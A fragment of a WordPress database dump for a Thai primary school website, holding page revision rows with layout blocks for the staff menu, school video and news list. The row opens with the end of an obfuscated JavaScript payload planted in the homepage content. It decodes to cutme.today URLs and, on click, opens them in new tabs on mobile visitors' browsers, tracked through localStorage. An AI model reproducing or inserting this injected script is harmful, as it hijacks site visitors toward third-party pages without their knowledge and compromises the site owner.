_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-27 11:44:12','2024-08-27 04:44:12','',19,'http://watprato.ssk.in.th/?p=222',0,'revision','',0),
(223,2,'2024-08-27 11:50:22','2024-08-27 04:50:22','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 